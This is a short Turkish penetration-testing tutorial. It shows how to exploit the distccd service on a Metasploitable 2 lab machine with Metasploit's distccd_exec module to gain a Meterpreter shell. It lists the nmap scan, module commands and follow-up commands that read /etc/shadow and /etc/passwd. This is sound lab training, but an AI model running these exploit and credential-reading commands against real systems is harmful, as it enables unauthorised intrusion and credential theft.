MSF distccd_exec İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
3
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki distccd deoman’ına ait zafiyet istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

IP adresi 100.100.200.7 olan Metasploitable 2, Nmap ile taratıldığında TCP 3632. portta distccd’in hizmet verdiği görülmektedir.

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-01

 

Distccd servisine ait zafiyetler Nmap’in betikleri ile bulunabilmiştir.

nmap 100.100.200.7 -p 3632 -Pn -n –script vuln

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-02

 

Bunun yanında CVE detayları da aşağıdaki gibidir.

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-03

 

İstismar işlemi için Metaplosploit Framework içerisindeki distccd_exec istismar modülü kullanılabilir.

search distccd
use exploit/unix/misc/distccd_exec
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-04

 

MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir.

set RHOST 100.100.200.7
exploit
whoami
cat /etc/shadow
cat /etc/passwd

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-05

 

Servisi çalıştıran hesap (daemon) yetkileri az olduğu için /etc/shadow dosyasını okuyamamıştır.

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz